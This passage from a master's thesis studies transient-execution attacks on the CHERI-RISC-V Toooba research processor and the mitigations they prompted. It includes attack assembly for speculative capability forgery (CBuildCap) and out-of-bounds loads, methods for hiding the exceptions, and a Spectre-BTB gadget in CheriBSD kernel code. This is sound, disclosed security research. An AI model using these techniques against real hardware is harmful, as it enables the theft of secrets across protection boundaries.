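A minimal sketch of this gating behaviour, assuming simplified LSQ entries (the field names are illustrative, not Toooba's actual ones):

```python
# Sketch of the Meltdown-US-CHERI mitigation: in the last memory-pipeline
# stage the capability bounds are checked and an exception cause is
# recorded in the LSQ entry; only entries without a cause are ever issued
# to memory, so no transient result exists to leak.

from dataclasses import dataclass
from typing import Optional

@dataclass
class LSQEntry:
    addr: int
    cause: Optional[str] = None

def enqueue_load(addr, base, top):
    entry = LSQEntry(addr)
    if not (base <= addr and addr + 8 <= top):  # 8-byte cld access
        entry.cause = "CapBoundsViolation"      # exception recorded here
    return entry

def issue_to_memory(entry):
    return entry.cause is None                  # faulting loads never issue

in_bounds = enqueue_load(0x80001080, base=0x80001000, top=0x80001100)
out_of_bounds = enqueue_load(0x80001100, base=0x80001000, top=0x80001100)
assert issue_to_memory(in_bounds)
assert not issue_to_memory(out_of_bounds)       # nothing for the attacker
```

Because the out-of-bounds load never leaves the LSQ, the dependent revealing load never receives its index.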
5.2.2 Meltdown-GP-CHERI
The Meltdown-GP attack – presented in Section 4.2.2 – and the Meltdown-GP-
CHERI attack have large similarities. Both attacks seek to read a register
which the code has no permissions to read. In my Meltdown-GP-CHERI ex-
ample, the attacker wants to access the SCR mscratchc, which cannot be ac-
cessed if the current PCC does not have the ASR bit set, which is the case in my
melt_us_cheri:
// set ct0 offset out of bounds
cincoffsetimm ct0, ct0, 512
// perform load out of capability bounds
cld t2, 0(ct0)
// load again from another capability with offset
cincoffset ct1, ct1, t2
cld t2, 0(ct1)
Figure 5.6: Reproduction of the Meltdown-US attack tailored to CHERI ca-
pabilities.
setup for this attack. The access is followed by a load to an attacker-accessible
array in order to make the secret visible. Meltdown-GP-CHERI is therefore
a variant of Meltdown-GP tailored to CHERI systems as they offer the ASR
functionality compared to conventional RISC-V systems. However, as marked
in Table 5.3, this attack is not possible on CHERI-RISC-V Toooba. Similar to
the description of Meltdown-GP in Section 4.2.2, checking whether the ASR
bit is set is done as a part of the Rename stage in Toooba. This leads to the
instruction being marked as executed in the ROB entry, which means that it
never enters the ALU pipeline. Therefore, the result will never be produced,
which mitigates the attack as the following transient-instruction sequence can-
not reveal the secret register value.
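This Rename-stage handling can be sketched as follows (the ROB-entry field names are assumptions for illustration):

```python
# Sketch of the Meltdown-GP-CHERI mitigation: the ASR check happens in
# the Rename stage; a faulting SCR read is marked as executed in its ROB
# entry without ever entering the ALU pipeline, so no result is produced
# for dependent transient instructions.

def rename_scr_read(pcc_has_asr):
    rob_entry = {"executed": False, "exception": None, "result": None}
    if not pcc_has_asr:
        rob_entry["executed"] = True          # skips the ALU pipeline
        rob_entry["exception"] = "CHERI-ASR"  # raised later at commit
    return rob_entry

entry = rename_scr_read(pcc_has_asr=False)
assert entry["executed"] and entry["result"] is None  # nothing to leak
```

Since the result field is never written, the following revealing load has no secret-dependent index to use.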
5.2.3 Meltdown-CF
Meltdown-CF (Capability Forgery) is a new subclass of transient-execution
attacks that was developed in this master’s thesis work. The goal of all at-
tacks in this subclass is the same: forging a capability to memory that the
attacker should not have access to in speculation and using this accordingly
in order to leak secrets. Therefore, Meltdown-CF attacks pose a large threat
to CHERI systems. All attacks in the Meltdown-CF class are inspired by
Jonathan Woodruff and members of the CHERI team who suspected a vul-
nerability in CHERI-RISC-V Toooba and encouraged me to attempt these ex-
ploits.
CBuildCap
The CBuildCap instruction has been added to CHERI-RISC-V in order to
increase performance when importing capabilities. CBuildCap attempts to
build a capability from a bit pattern. This instruction has three operands: The
bit pattern stored in a capability register, an authorising capability stored in
another capability register, and the destination capability register. The bit pat-
tern does not need to be tagged, but it must not pose an escalation of privileges
of the authorising capability. If this invariant is broken, an exception will be
raised [37]. The CBuildCap instruction can be logically split into two sub-
operations. First, the capability checks have to be conducted. Second, if the
capability checks were successful, the input capability bit pattern is tagged –
therefore becomes a valid capability – and written to the destination register.
The main part of the attack code is depicted in Figure 5.7. This code is
expected to run in an attacker controlled compartment whose PCC is limited
to certain addresses. In this scenario, the attacker can be a user that now acts as
an adversary on a CHERI system. The goal of the attacker is to speculatively
craft a powerful capability in order to read secrets of other compartments.
The register a0 holds the index to be used to access the speculatively created
capability and ca1 holds the bit pattern to be used with CBuildCap. The
index is shifted logically left by four bits in order to produce 16 byte memory
chunks to be accessed. The attack is designed such that the load following
the shift instruction will miss all caches and therefore produces the maximum
load penalty possible. The CBuildCap instruction does not depend on the
previous instructions and can be executed out-of-order before the load
finishes. In fact, all instructions following the load are not dependent on the
load. Therefore, all of these instructions can be executed before the slow load
finishes, but none of them can commit before the load commits.
The CBuildCap instruction has cs1 as authorising capability, which is
derived from DDC, but limited to the addresses [0x80001000−0x80002000],
which in my example is the most powerful data capability the attacker has
access to. The bit pattern passed in ca1 is the almighty capability spanning
the entire address space with the tag bit stripped. However, this breaks the
invariant that the authorising capability must be equally or more powerful than
the bit pattern. The CBuildCap instruction will fail, but for now we assume
that it does not and that all subsequent instructions will be executed normally.
Next, the attack uses the index calculated before and adds it to the capability
address. This is the address of the secret value, which is loaded in the next
instruction. This secret value is used as an index to a user accessible array,
access_funct:
// a0: index to 16 byte chunks
// ca1: bit pattern for capability to be built
slli a0, a0, 4
// misses all caches and produces
// maximum miss penalty
cld t1, 0(cs1)
// will raise an exception, but before
// that it will reveal the secret
cbuildcap ct2, cs1, ca1
cincoffset ct2, ct2, a0
// load twice to reveal secret
cld t0, 0(ct2)
cincoffset cs7, cs7, t0
cld t0, 0(cs7)
cret
Figure 5.7: Overview of the CBuildCap attack code.
whose base address is held in cs7. The load to this address reveals the secret
to the attacker as they can probe the user accessible array later in order to find
out the secret value.
Toooba’s ALU has four pipeline stages: Dispatching the instruction to
the ALU, reading the register values, doing the actual operation, and writing
back the calculated value. Toooba reverses the order of the sub-operations for
CBuildCap in order to improve performance. It first tags the input data and
then performs the capability checks, which are called CapMod and CapCheck
in Figure 5.8. This means that there exists a tagged capability that has not
been checked yet in the actual executing stage. In the next stage, the writeback
stage called FinishALU in Figure 5.8, Toooba performs the actual checks and
finishes the execution of CBuildCap by marking it as executed in the ROB.
This will also set a field in the ROB that this instruction created an exception.
In order to improve performance Toooba uses forwarding of ALU results to
subsequent operations. In general, forwarding avoids stall cycles that would be
introduced by writing the result to the register file and other operations having
to wait to read this value. Toooba uses forwarding in both the ExeALU and the
FinishALU stage, as well as writing the data to the register file in the FinishALU
stage. For my attack, this means that the powerful tagged capability will be
[Figure: the ExeALU stage (CapMod) forwards speculative capability values to
the FinishALU stage (CapCheck), which reports the trap code to the reorder
buffer; both stages read from and write to the register file.]
Figure 5.8: The last two stages of the Toooba ALU pipeline which forwards
modified capabilities before performing capability checks.2
forwarded to subsequent instructions which use the result of the CBuildCap
instruction.
An instruction commits when it is at the head of the ROB. Toooba raises the
exception at the commit phase because only at this point is it certain that the
exception really occurred; before commit, it could have come from a speculative
execution path that should not have been taken. In the meantime, the
speculatively crafted almighty capability can be freely used to access
the entire memory space, e.g., to read secret memory of other compartments.
This is possible because – like many other processors – Toooba does not stall
its pipeline in the case of a speculative hardware exception, in order to
increase performance.
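The reversed sub-operation order and forwarding can be illustrated with a toy model (the capability representation and bounds are simplified assumptions):

```python
# Toy model of the CBuildCap hazard: the ExeALU stage tags the bit
# pattern (CapMod) and forwards the result before the FinishALU stage
# runs the capability checks (CapCheck), so dependent transient
# instructions briefly see a forged, tagged capability.

def cap_mod(bit_pattern):
    cap = dict(bit_pattern)
    cap["tag"] = True             # tag first ...
    return cap

def cap_check(auth, cap):
    # ... check later: the result must not exceed the authorising capability
    return auth["base"] <= cap["base"] and cap["top"] <= auth["top"]

auth = {"base": 0x80001000, "top": 0x80002000, "tag": True}
almighty = {"base": 0x0, "top": 2**64, "tag": False}

forwarded = cap_mod(almighty)          # value seen by dependent instructions
assert forwarded["tag"]                # forged capability usable transiently
assert not cap_check(auth, forwarded)  # exception detected only in FinishALU
```

Performing `cap_check` before `cap_mod` (or gating the forwarding on the check) would close this window, at the cost of the extra pipeline latency the design tried to avoid.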
The attack – as depicted in Figure 5.7 – will cause the operating system to
react to the hardware exception being raised. This will lead to the termination
of the process running this code, which can be disadvantageous for the attacker
for two reasons. First, the attacker often wants to conduct the attack multiple
times and therefore wants to keep the victim process running. Second, the
exception will entail a call to the operating system’s exception handler, which
will perform load operations itself and therefore might cause a lot of noise
from the attacker’s point of view.
As described in [27], an attacker has multiple options to hide the exception.
One option is to fork a child process and execute the attack code there. This
will solve the problem of keeping the actual attack process open, but still the
child process will trigger the invocation of the exception handler and poten-
tially make the results useless because of noise. Another option is to hide the
CBuildCap instruction and the transiently executed instruction sequence in
a speculative frame. This means that I insert a branch instruction before the
2 This figure is borrowed from the CHERI team.
CBuildCap instruction with a branch target that lies after the second tran-
sient load. The branch instruction needs to be slow to resolve for Toooba,
which can be achieved by making the branch instruction dependent on a load
that misses all caches. I train the branch so that the actual attack code path
will always be predicted to be taken as explained in Section 5.1.1. During the
actual attack, I provide parameters such that the attack path will eventually not
be taken. Therefore, the attack code is still executed speculatively, but the
exception is hidden by the rollback that Toooba will eventually perform.
This step is combining the CBuildCap attack with a Spectre-PHT attack
as suggested by Lipp et al. [27]. This solves both problems – keeping the
process open and avoiding the invocation of the exception handler – because
the exception never occurs at the architectural level. One drawback is that the effective
speculative window for the attacker becomes smaller due to an extra instruction
that has to be executed before the actual attack code. However, this proves to
be no problem in Toooba and I have successfully crafted this variant of the
CBuildCap attack.
Another mechanism proposed in [27] is the use of transactional memory.
If a failure occurs in a sequence of memory accesses that the architecture has
made transactional, all operations in that transaction will be rolled back.
However, effects on the cache might already have taken place, and secrets can
therefore be leaked. RISC-V mentions a Standard Extension for Transactional
Memory; however, this has not been specified yet [11] and therefore cannot
be used on RISC-V architectures to hide an exception.
CSetBounds
This attack is comparable to the CBuildCap attack presented above. The
goal of the attack is to extend the bounds of a capability, which breaks the
monotonicity constraint of CHERI capabilities. The CSetBounds instruc-
tion sets the bounds of a capability while ensuring monotonicity. If the new
value for the bounds is greater than the value so far, an exception will be
raised [37]. The attack is performed the same way the CBuildCap attack
was performed. A load that misses all caches – or any instruction that intro-
duces a delay long enough – enables the transient-execution sequence to take
effect before the exception caused by the CSetBounds instruction is raised.
The transient-execution sequence comprises the following steps: setting the
address to a value of interest for the attacker, accessing that value, and finally
accessing an attacker-visible array with the secret as the index in order to leak
the secret.
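The final step of this sequence – leaking the secret through an attacker-visible array – can be sketched with a toy cache model. Set membership stands in for real cache-timing measurements, and the line size and value range are illustrative constants:

```python
CACHE_LINE = 64   # illustrative cache-line size
NUM_VALUES = 256  # one probe-array line per possible secret byte

def transient_leak(secret, cache):
    """Models the transient access: indexing the attacker-visible array
    by the secret brings exactly one cache line into the cache."""
    cache.add(secret * CACHE_LINE)

def probe(cache):
    """Models a Flush+Reload-style probe: the single cached line
    reveals the secret byte."""
    hits = [v for v in range(NUM_VALUES) if v * CACHE_LINE in cache]
    return hits[0] if len(hits) == 1 else None

cache = set()  # models which probe-array lines are currently cached
transient_leak(0x41, cache)
assert probe(cache) == 0x41
```

In the real attack, the probe step measures access latencies instead of testing set membership, but the recovery logic is the same.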
56 CHAPTER 5. CHERI-RISC-V RESULTS
Analogous to the CBuildCap attack, the CSetBounds attack will raise
an exception in the form presented above. As explained, hiding the exception
in a speculative frame is the best option for an attacker. I have successfully
implemented both a variant that eventually raises a hardware exception and a
variant that hides the exception.
CInvoke
Both the CBuildCap and the CSetBounds attack operate on conventional
unsealed data capabilities. In contrast, this attack works on sealed capabilities.
Sealed capabilities cannot be dereferenced and thus are not of great use to an
attacker. Therefore, it is the attacker’s goal to unseal this data capability and
access the memory addresses it grants access to. Since sealed capabilities
cannot be dereferenced, it is deemed secure to pass them to non-trustworthy
processes. This way, an attacker can get access to a sealed data capability.
The CInvoke instruction was designed to allow fast jumps between pro-
tection domains. It takes a sealed code capability pointing to the code the
user wants to jump to and a sealed data capability; together, these form a
capability pair. CInvoke unseals the code capability and jumps to it.
Furthermore, it unseals the data capability and moves it into a
general-purpose capability register. In order to be considered a valid operation,
CInvoke needs to pass many checks, e.g. both capabilities need to be tagged
and sealed. In my scenario, I primarily attack the requirement that the
capability pair must have the same otype. However, I violate multiple other
invariants as well [37]. A failure of any of these checks will lead to an
exception being raised by Toooba.
My approach for the attack is to use a code capability that points to a gadget
in the attacker's code space. For the data capability, I use a powerful sealed
capability that the attacker does not have a suitably authorising capability to
unseal. The CInvoke instruction is executed with these two capabilities as
parameters. In order to delay the exception being raised, a load missing all
caches is used again. With the exception being delayed, the code speculatively
jumps to the attacker’s chosen gadget and the data capability is unsealed and
forwarded. The gadget loads the secret and reveals it by a second transient
load. Hiding the exception in a speculative frame is again the best way of
conducting this exploit from an attacker’s perspective.
CUnseal
Similar to the attack above, the goal of this attack is to unseal a capability
without having the necessary privileges. The CUnseal instruction requires
two parameters: the capability to be unsealed and the capability authorising
this. If the CUnseal instruction fails, a hardware exception will be raised.
For CUnseal, there are multiple reasons why this instruction can fail – in my
attack I focus on a TypeViolation. This is raised when the otype of the sealed
capability is not equal to the address of the authorising capability [37]. Again,
in my attack scenario, the attacker has already obtained a powerful sealed data
capability or can obtain it when needed, e.g., by reading from memory shared
with another process running on the CHERI system.
The actual attack approach is similar to the CInvoke attack. The attacker
does not possess a suitable capability that allows unsealing the powerful data
capability. In order to delay the exception being raised, the attacker performs a
load with a great miss penalty. Toooba’s forwarding again enables a transient-
execution sequence to make a secret visible to the attacker. If an attacker wants
to conduct the attack more than once, hiding the exception in a speculative
execution frame is the best solution.
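The architectural check attacked here – shared by CUnseal and the otype comparison in CInvoke – can be modelled in a few lines. The field names and the unsealed-otype encoding below are simplifications of my own, not the CHERI Concentrate format:

```python
from dataclasses import dataclass, replace

UNSEALED = -1  # simplified marker for "not sealed", not the real encoding

@dataclass
class Capability:
    address: int
    otype: int = UNSEALED
    tag: bool = True

class CheriException(Exception):
    pass

def cunseal(sealed_cap, auth_cap):
    """Architectural semantics sketch: the authorising capability's
    address must equal the sealed capability's otype, else TypeViolation."""
    if not (sealed_cap.tag and auth_cap.tag and sealed_cap.otype != UNSEALED):
        raise CheriException("tag/seal violation")
    if auth_cap.address != sealed_cap.otype:
        raise CheriException("TypeViolation")
    return replace(sealed_cap, otype=UNSEALED)

powerful = Capability(address=0x80040000, otype=5)  # sealed with otype 5
wrong_auth = Capability(address=7)  # attacker's capability: wrong otype

try:
    cunseal(powerful, wrong_auth)
    raised = False
except CheriException:
    raised = True
# Architecturally the unseal traps; the attack exploits the window
# before this exception is raised.
assert raised
```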
Chapter 6
Discussion
One of the main goals of this thesis work is to contribute a platform to foster
research of transient-execution attacks both on RISC-V and CHERI-RISC-V
processors. The experiments presented in Chapters 4 and 5 show vulnera-
bilities being present in Toooba and the need to develop and deploy mitiga-
tion mechanisms. In this chapter, I describe how my framework impacted the
CHERI team and helped to develop and improve SinglePCC – a mitigation
mechanism against Spectre-style attacks in CHERI-RISC-V Toooba. Further-
more, my work has triggered initial plans for Meltdown-CF mitigation.
6.1 SinglePCC
The SinglePCC mechanism was mainly developed by Jonathan Woodruff
and was inspired by my experiments and their results, as all Spectre-style
attacks were found to violate CHERI's security model.
6.1.1 Mechanism
As of now, CHERI-RISC-V Toooba uses the entire PCC of the target for branch
prediction, which means that both the actual address and the privileges,
including the bounds, are predicted. SinglePCC removes the privileges com-
pletely from the prediction. In order to determine whether an instruction is in
bounds, it uses the PCC bounds of the last committed instruction. Whenever
an instruction that changes the bounds, e.g., a cjalr instruction, is executed,
the bounds are updated as well. The BTB and RSB now carry only the address
and no bounds or other privileges. If the address of an instruction is out of
the current bounds, e.g., the target of a jump to another
CHAPTER 6. DISCUSSION 59
compartment, this instruction has to wait until its bounds can be derived from
the current register state without speculation. This approach decreases
overall system performance, as waiting for the bounds to reach the register
state can incur additional pipeline flushes, but it does not allow any
speculation across compartment boundaries.
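The resulting policy can be summarised in a few lines. This is a behavioural sketch of the check as described above, not Toooba's implementation, and the addresses are illustrative:

```python
def may_speculate(predicted_addr, committed_base, committed_top):
    """SinglePCC policy sketch: the BTB/RSB supplies only an address;
    the bounds come from the last committed instruction's PCC.
    Targets outside those bounds must wait for non-speculative
    resolution instead of being followed speculatively."""
    return committed_base <= predicted_addr < committed_top

# In-bounds predicted target: speculation may proceed.
assert may_speculate(0x80041000, 0x80040000, 0x80050000)
# Attacker-injected cross-compartment target: stall, no speculation.
assert not may_speculate(0x80080000, 0x80040000, 0x80050000)
```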
6.1.2 Testing SinglePCC
I ran all major Spectre-style attacks on the branch of Toooba that has been ex-
tended with SinglePCC. The results are summarised in Table 6.1. SinglePCC
successfully mitigates attacks that inject into the BTB or RSB an address
that is out of bounds of the PCC for the current compartment or part of the
code, e.g., a function whose PCC is limited exactly to its respective code.
A jump to another compartment is still possible – but not in speculation.
Consequently, the attacker-chosen gadget will never be
executed. However, SinglePCC does not mitigate the following attack case: I
assume two identical compartments that differ only in their ASIDs. One
compartment is under the attacker's control, the other is benign. The
compartment under attacker control can inject an entry into the BTB or RSB,
and the next time the benign compartment is executed, it will follow the
misprediction. Capabilities describe
virtual addresses, but do not contain any information about address spaces.
SinglePCC mandates that any address followed in speculation must lie within
the current bounds, but this does not forbid this case of cross-protection-domain
training because SinglePCC does not know about the different address spaces.
Furthermore, SinglePCC does not mitigate Spectre-PHT nor does it mit-
igate Spectre-STL-Load. In the case of Spectre-PHT, the attacker only mis-
trains the branch direction, but both the taken and the not-taken targets
are in the current bounds, so SinglePCC does not take effect here. For
Spectre-STL-Load, the reason is
similar. This attack loads a stale memory value, but it does not affect branch
targets and therefore the address always stays within the current bounds. How-
ever, SinglePCC mitigates Spectre-STL-Jump if the jump goes out-of-bounds
for the same reasons as SinglePCC mitigates Spectre-BTB and Spectre-RSB.
Last, SinglePCC only mitigates attacks that involve jumping. Therefore, Sin-
glePCC does not mitigate any of the Meltdown-CF attacks.
With SinglePCC enabled, an attacker cannot train the BTB with targets
outside of the bounds of the current PCC. However, the attacker can train the
BTB with targets in bounds. If the current bounds are not tight, this gives
the attacker a higher probability of finding a suitable gadget in the victim's
code.

                   asm   CHERI asm
Spectre-PHT         ✓        ✓
Spectre-BTB         ✓        ✗
Spectre-RSB         ✓        ✗
Spectre-STL-Load    ✓        ✓
Spectre-STL-Jump    ✓        ✗

Table 6.1: Overview of attempted Spectre-style attacks and whether they were
successful (✓) with SinglePCC applied.
6.1.3 Hardening SinglePCC
Running the Spectre-style transient-execution attacks in Toooba with
SinglePCC enabled revealed a dangerous vulnerability in the initial Sin-
glePCC implementation. My example of Spectre-RSB worked even though
the return address injected into the RSB was out of bounds of the victim's
current PCC. In collaboration with Jonathan Woodruff, I traced this back
to an error in the microarchitecture. In my example, the victim
PCC starts at address 0x80040000, whereas the attacker PCC starts at address
0x80080000. The entire PCCs of the victim (PCCv) and the attacker (PCCa)
are:
PCCv = 0xffff200000018004_0000000080040000 (6.1)
PCCa = 0xffff200000018004_0000000080080000 (6.2)
In order to understand the error in the microarchitecture, I need to ex-
plain CHERI Concentrate [38] – the compression mechanism used in order
to achieve 128-bit capabilities. As depicted in Figure 6.1, CHERI Concen-
trate divides the memory space into three different parts from the view of one
capability: the unrepresentable region, the representable space, and the deref-
erenceable region.
In the erroneous SinglePCC implementation, Toooba pulled the address
from the RSB and then applied a function that adds the bounds of the current
PCC. In order to improve overall performance – to shorten the critical path
[Figure: the dereferenceable region, delimited by base and top, lies within
the larger representable space; addresses outside the representable space
form the unrepresentable region.]
Figure 6.1: Memory regions implied by the CHERI Concentrate encoding.
Taken and adapted from Woodruff et al. [38].
– the implementors used a function that sets the address, but does not check
whether the address is representable. This function is unsafe, but superior
to its safe counterpart in terms of performance. Because of the alignment of
the victim and attacker PCC, they have the same encoding through CHERI
Concentrate. PCCv and PCCa differ only in the actual address, but the com-
pressed bounds bits are identical. In general, CHERI Concentrate can have
multiple memory regions whose bounds are encoded with the same bit pat-
tern – these capabilities differ only in the actual address. Setting the address
unsafely means that the attacker address pulled from the RSB is considered
in bounds. The bounds check following the address-setting function therefore
does not fail, Toooba speculatively jumps to the attacker's gadget, and the
entire attack succeeds.
My findings caused the SinglePCC implementation to be reviewed and
changed accordingly. A more costly but safe function for setting the address
coming from the RSB is used in the current design. This function checks
whether the address lies in the unrepresentable region and, in my attack case,
strips the capability's tag bit. In turn, this invalid capability does not pass
the bounds checks, and Toooba does not speculatively jump to this address
– as intended.
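The bug and its fix can be illustrated with a heavily simplified model of the encoding. The region size, field layout, and alignment assumptions below are illustrative stand-ins for CHERI Concentrate, chosen so that the victim and attacker addresses from Equations 6.1 and 6.2 share the same bounds bits:

```python
REGION = 0x40000  # illustrative aligned region size covering the PCC bounds

def decode_bounds(addr, lo_off, hi_off):
    """Bounds are stored as offsets within the power-of-two region that
    contains the address, so aligned copies share identical bounds bits."""
    region_base = addr & ~(REGION - 1)
    return region_base + lo_off, region_base + hi_off

def unsafe_set_address(cap, new_addr):
    """Fast path used in the buggy implementation: replace the address,
    keep the compressed bounds bits, skip the representability check."""
    return dict(cap, addr=new_addr)

def safe_set_address(cap, new_addr):
    """Fixed path: an unrepresentable address strips the tag, so later
    bounds checks fail and the speculative jump is suppressed."""
    new = dict(cap, addr=new_addr)
    if new_addr & ~(REGION - 1) != cap["addr"] & ~(REGION - 1):
        new["tag"] = False
    return new

def in_bounds(cap):
    lo, hi = decode_bounds(cap["addr"], cap["lo_off"], cap["hi_off"])
    return cap["tag"] and lo <= cap["addr"] < hi

victim_pcc = {"addr": 0x80040000, "lo_off": 0x0, "hi_off": REGION, "tag": True}
rsb_addr = 0x80080000  # attacker return address, outside the victim's bounds

# Buggy path: the bounds decode relative to the attacker's address, so the
# out-of-bounds target appears in bounds and the attack succeeds.
assert in_bounds(unsafe_set_address(victim_pcc, rsb_addr))
# Fixed path: the tag is stripped and the bounds check fails.
assert not in_bounds(safe_set_address(victim_pcc, rsb_addr))
```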
Later, Woodruff implemented another approach that decodes the bounds
of the current PCC and writes them to hardware registers. These bounds are
then used for comparing against addresses coming from the BTB and RSB.
These bounds registers change only when a jump is architecturally taken.
ld   a0, 1000(s5)   # load a pointer from memory
ld   a1, 208(a0)    # load the indirect jump target into a1
add  a0, zero, s1
jalr ra, a1         # indirect jump predicted via the BTB
Figure 6.2: CheriBSD kernel code that is suitable for a Spectre-BTB attack.
6.1.4 Spectre-BTB in Kernel Code
In order to confirm the need for mechanisms that mitigate Spectre-style at-
tacks, I present a possible vulnerability that would allow an attacker to bypass
CHERI's security measures in a real-world environment. In this section, I
describe a possible attack on a CHERI system that exploits the presence of an
operating system – in this case CheriBSD. In this attack scenario, I use the
hybrid-kernel version
of CheriBSD, which means that the kernel itself does not use capabilities for
its code and data, but the kernel fully enables user-space programs to do so.
In Figure 6.2, I show a short snippet of the CheriBSD kernel code for han-
dling exceptions. The reader may note that this code is not CHERI-RISC-V
assembly, but conventional RISC-V assembly, because the kernel itself does
not use capabilities. This code is part of the syscallenter function, which
is indirectly called by the do_trap_user function – the function that handles
exceptions coming from U privilege mode. The
code depicted in Figure 6.2 fulfills all the criteria in order to be exploitable
for a Spectre-BTB attack. As described in Section 5.1.3, the goal of the at-
tacker is to alias an indirect jump, which is in this example jalr ra, a1.
Furthermore, the attacker has to ensure that the load operation writing into
a1 is delayed, e.g., by making it miss all caches. This leads to a misspeculation
to the attacker's gadget that was previously injected into the BTB.
This kind of attack is a large threat to CHERI systems as it gives attack-
ers powerful capabilities normally used by the kernel. The attacker could at-
tempt to find a powerful capability, e.g., derived from a SCR or a CSR, that
still is in the register state from calls to previous functions. However, the fact
that the kernel is not using capabilities gives the attacker another option to
conduct impactful attacks. For memory operations not issued through capa-
bilities, CHERI systems implicitly use the DDC register. In order to satisfy
the wide range of memory accesses performed by the kernel, the capability in
DDC has to be configured with suitably broad privileges. In case of an attack, the DDC
register can be used by attackers as well and gives them plenty of options to
attack CheriBSD’s kernel through Spectre-BTB attacks.
As presented in Section 6.1.2, SinglePCC will mitigate attacks that are
based on Toooba misspeculating to another compartment. In order to success-
fully mitigate the attack above, SinglePCC requires the bounds of the kernel
PCC to be tight. If this is not the case, SinglePCC will not mitigate
this attack as no out-of-bounds jump will be detected. Therefore, this example
illustrates again how important it is for the overall security of a CHERI system
to be configured with the principle of least privilege. Furthermore, it shows
the importance of the framework I created during my work.
6.2 Preventing Meltdown-CF
The Meltdown-CF attacks explained in Section 5.2.3 pose a large threat to
CHERI systems. The analysis presented in this work inspired CHERI hard-
ware designers to propose solutions that are outlined in the following para-
graphs. All Meltdown-style attacks are caused by exceptions not being raised
at the right point in time in the pipeline, which leads to illegal data being
forwarded and used in transient-execution sequences. As explained in Sec-
tion 2.4.5, CHERI implementations need to prevent Meltdown-CF attacks.
This can be done both architecturally and microarchitecturally.
Jonathan Woodruff and Peter Rugg proposed in several personal meetings
that the ISA could be changed such that instructions in the Meltdown-CF sub-
class no longer throw hardware exceptions, but instead forward invalid capa-
bilities in case of a failure. This will entirely prevent transient-execution from
taking effect as memory operations through invalid capabilities are not allowed
and will lead to a hardware exception in Toooba.
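Woodruff and Rugg's architectural proposal can be sketched as follows. The capability fields and the CSetBounds model here are simplifications of my own, not the proposed implementation:

```python
class TagViolation(Exception):
    pass

def csetbounds(cap, new_base, new_top):
    """Proposed behaviour sketch: instead of trapping, a monotonicity
    violation forwards an untagged (invalid) capability."""
    out = {"base": new_base, "top": new_top, "tag": cap["tag"]}
    if new_base < cap["base"] or new_top > cap["top"]:
        out["tag"] = False  # bounds widened: result is invalid, no trap
    return out

def load_via(cap, addr):
    """Any memory access through an untagged capability raises the
    exception instead, so a forged capability is never dereferenced --
    not even transiently."""
    if not cap["tag"]:
        raise TagViolation("load through invalid capability")
    assert cap["base"] <= addr < cap["top"]
    return 0  # placeholder for the loaded value

narrow = {"base": 0x1000, "top": 0x2000, "tag": True}
forged = csetbounds(narrow, 0x0, 0x10000)  # transient attempt to widen bounds
assert not forged["tag"]  # no exception here -- just an invalid result
```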
Furthermore, Woodruff and Rugg presented the idea of changing the mi-
croarchitecture only without adjusting the ISA. They propose to not write any
capability to the physical register file that exceeds the privileges of its operands
even if only used in a transient path. This will prevent any privilege escalation.
Both approaches share a common requirement: the capability checks
need to be resolved before writing any value to the physical register file. Wood-
ruff and Rugg state further that this will not have a performance impact on
CUnseal and CInvoke, but it will cost performance for the CBuildCap and
CSetBounds instructions due to capability compression being on the critical
path.
6.3 Ethics and Sustainability
When conducting attacks for scientific reasons, it has to be ensured both that
no harm is done to real-world systems and that the attack is responsibly
disclosed. Responsible disclosure means that the researchers wait a period of
time before publicly disclosing the vulnerability so that operators of affected
systems have enough time to take countermeasures.
ciples from the beginning [22, 27]. I complied with these principles through-
out my thesis work as well. Whilst performing my attacks, I only operated on
a simulation running on a server and therefore did no harm to any real-world
system. Toooba is a research processor in development whose purpose is to
enable security research. Therefore, I can disclose the found vulnerabilities
immediately with the publication of this thesis. One goal of this thesis was to
provide a platform for further research on these attacks.
Another goal was to show the possibility for transient-execution attacks.
As described in previous sections in this chapter, my research has led to initial
mitigation mechanisms being put in place in Toooba. This will inspire hard-
ware designers to develop more sophisticated mitigation mechanisms that will
strengthen CHERI's security claims. The computer science community is now
aware that transient-execution attacks affect many microarchitectures and that
mitigation mechanisms are crucial.
A point often overlooked is sustainability. Modern computing can help to
sustainably use resources, e.g., smart irrigation systems. However, all systems
need computing power in order to make decisions that benefit sustainability.
My research will lead to CHERI systems becoming more secure. CHERI’s
strong security claims will remove concerns about security and therefore foster
the use of CHERI in sustainable systems.
6.4 Future Work
This thesis work answered the question of whether transient-execution attacks
are possible in Toooba and CHERI systems in general. However, many ques-
tions still remain unanswered – especially regarding more advanced transient-
execution attacks running in a real-world environment. Currently, Toooba is
fairly conservative and is not yet instantiated with a multi-core setup. This ef-
fectively mitigates advanced transient-execution attacks, but also significantly
limits performance. Changes on a per-core basis, e.g., adding sophisticated
data-value speculation to the processor, will enrich the microarchitectural state,
which will give an attacker plenty of options to attempt transient-execution at-
tacks on a RISC-V or CHERI-RISC-V system. This means that future work
will aim to improve Toooba’s performance and evaluate whether a richer mi-
croarchitectural state leads to the possibility of sophisticated transient-execution
attacks.
It is not yet clear how CHERI capabilities interact with transient-execution
attacks. In most cases, capabilities are an obstacle for an attacker, but they
can also be advantageous. In a single-address-space operating system as
proposed in [37], speculative bounds escalation can pose a large threat
to CHERI systems, as the CBuildCap attack example has shown. It has to be
researched whether there exist other ways to escalate privilege in speculation.
Furthermore, other interactions in a full operating system environment are of
interest to the attacker, e.g. achieving longer load miss penalties by creating
TLB misses. Besides the feasibility of an attack, the quality of possible attacks
has to be investigated. CHERI-RISC-V systems differ in their instruction
sequences from conventional RISC-V systems and are likely to introduce
noise, e.g., capabilities have to be loaded from a capability table first. These
loads can affect cache traces and therefore change the transmission rates in
real-world attacks.
In general, my work has looked at Toooba only in simulation through Verilator.
An instance of Toooba synthesised to a Field Programmable Gate
Array (FPGA) will bring new insights and make the results more robust. Fur-
thermore, it would be interesting to conduct research on transient-execution
attacks on the ARM Morello architecture [49]. The different design choices
and the different underlying ISA will likely have an impact on which attacks
are successful and what their respective quality is.
Chapter 7
Conclusions
In this work, I performed initial research on transient-execution attacks on
the superscalar out-of-order CHERI-RISC-V microprocessor Toooba. I can
clearly answer the question of whether Toooba is vulnerable to transient-execu-
tion attacks in the affirmative. In both RISC-V and CHERI-RISC-V assembly,
I could successfully conduct transient-execution attacks. This work was the
first to completely reproduce the major transient-execution attacks on a RISC-
V processor and it was the first work to attempt attacks of this class against
CHERI capability protection. I find that transient-execution attacks violate
CHERI’s security model in two ways and therefore require mitigation and pre-
vention mechanisms to be put into place. First, control-flow can be hijacked
through Spectre-BTB and Spectre-RSB allowing attackers to direct control to
their chosen gadgets in speculation. Second, Meltdown-Capability-Forgery
